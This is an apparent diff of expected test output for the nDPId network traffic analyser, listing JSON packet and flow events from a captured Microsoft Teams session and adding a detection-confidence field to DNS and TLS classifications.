 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1587041681218,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1587041681218,"pkt":"EBMx8Tl2KDc3AG3ICABFAABLUFkAAP8R5\/DAqAEGwKgBAd06ADUANyl9Kf0BAAABAAAAAAAAB2NhcHRpdmUFYXBwbGUDY29tB2VkZ2VrZXkDbmV0AAABAAE="}
-00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1587041681248,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"ts_msec":1587041681248,"pkt":"KDc3AG3IEBMx8Tl2CABFAACAqEJAADkRFdPAqAEBwKgBBgA13ToAbAAAKf2BgAABAAIAAAAAB2NhcHRpdmUFYXBwbGUDY29tB2VkZ2VrZXkDbmV0AAABAAHADAAFAAEAAADSABkFZTcyNzkFZHNjZTkKYWthbWFpZWRnZcAmwDsAAQABAAAAFAAEFzKeWA=="}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":851,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"ts_msec":1587041681248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.50.158.88"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":851,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"ts_msec":1587041681248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.50.158.88"}}
 00364{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":853,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041681407,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00167{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":853,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":864,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041681611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00164{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":864,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1587041681714,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1587041681714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABCnaYAAP8RmqzAqAEGwKgBAcdZADUALvSsiC0BAAABAAAAAAAABmV1LWFwaQNhc20Fc2t5cGUDY29tAAABAAE="}
-00733{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":866,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1587041681714,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1587041681714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABRU9EAAP8R5HLAqAEGwKgBAfaCADUAPVgfcugBAAABAAAAAAAAB2V1LXByb2QHYXN5bmNndwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1587041681744,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1587041681744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC9OkBAADkRg5jAqAEBwKgBBgA19oIAqQAAcuiBgAABAAMAAAAAB2V1LXByb2QHYXN5bmNndwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAvAACoVYXNtLWFwaS1wcm9kLWV1LXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAQQAFAAEAAAEsABoOd2V1MS1hcGktdGVhbXMIY2xvdWRhcHDAZsB3AAEAAQAAAAoABDRyS0Y="}
-00773{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":873,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1587041681744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.70"}}
+00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":873,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1587041681744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.70"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681745,"flow_last_seen":1587041681745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041681745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1587041681745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041681745,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VHAqAEGNHJLRux6AbuCUaOxAAAAALAC\/\/8ErAAAAgQFtAEDAwUBAQgKMISsLQAAAAAEAgAA"}
 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1587041681754,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"ts_msec":1587041681754,"pkt":"KDc3AG3IEBMx8Tl2CABFAACo\/M1AADkRwR\/AqAEBwKgBBgA1x1kAlAAAiC2BgAABAAMAAAAABmV1LWFwaQNhc20Fc2t5cGUDY29tAAABAAHADAAFAAEAAAb4ACQPYXNtLWFwaS1wcm9kLWV1DnRyYWZmaWNtYW5hZ2VyA25ldADAMgAFAAEAAAEsABoOd2V1MS1hcGktc2t5cGUIY2xvdWRhcHDAUcBiAAEAAQAAAAUABDRyS0U="}
-00760{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":875,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1587041681754,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.69"}}
+00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":875,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1587041681754,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.69"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":876,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681755,"flow_last_seen":1587041681755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041681755,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1587041681755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041681755,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VLAqAEGNHJLRex7AbtPkLhOAAAAALAC\/\/8ixgAAAgQFtAEDAwUBAQgKMISsNwAAAAAEAgAA"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1587041681772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041681772,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8MUxAAG0Gmwk0cktGwKgBBgG77HoxlVjpglGjsqASIACccwAAAgQFoAEDAwgEAggKVud31zCErC0="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1587041681772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041681772,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V3AqAEGNHJLRux6AbuCUaOyMZVY6oAQEAnbCgAAAQEICjCErEZW53fX"}
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681745,"flow_last_seen":1587041681772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1587041681772,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681745,"flow_last_seen":1587041681772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1587041681772,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1587041681786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041681786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PqJAAGwGjrQ0cktFwKgBBgG77HsaOOK2T5C4T6ASIABGlgAAAgQFoAEDAwgEAggKVN17aDCErDc="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1587041681786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041681786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V7AqAEGNHJLRex7AbtPkLhPGjjit4AQEAmFKgAAAQEICjCErFNU3Xto"}
-00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681755,"flow_last_seen":1587041681786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1587041681786,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681755,"flow_last_seen":1587041681786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1587041681786,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":932,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682076,"flow_last_seen":1587041682076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041682076,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1587041682076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041682076,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VHAqAEGNHJLRux8AbuMg\/cHAAAAALAC\/\/+l4gAAAgQFtAEDAwUBAQgKMIStbAAAAAAEAgAA"}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":933,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682077,"flow_last_seen":1587041682077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041682077,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1587041682077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041682077,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VLAqAEGNHJLRex9AbuFeblcAAAAALAC\/\/\/qlgAAAgQFtAEDAwUBAQgKMIStbQAAAAAEAgAA"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":934,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1587041682106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041682106,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8XUVAAGwGcBA0cktGwKgBBgG77HwdJJF2jIP3CKASIACM5QAAAgQFoAEDAwgEAggKVscEoDCErWw="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":935,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1587041682106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041682106,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V3AqAEGNHJLRux8AbuMg\/cIHSSRd4AQEAnLdwAAAQEICjCErYpWxwSg"}
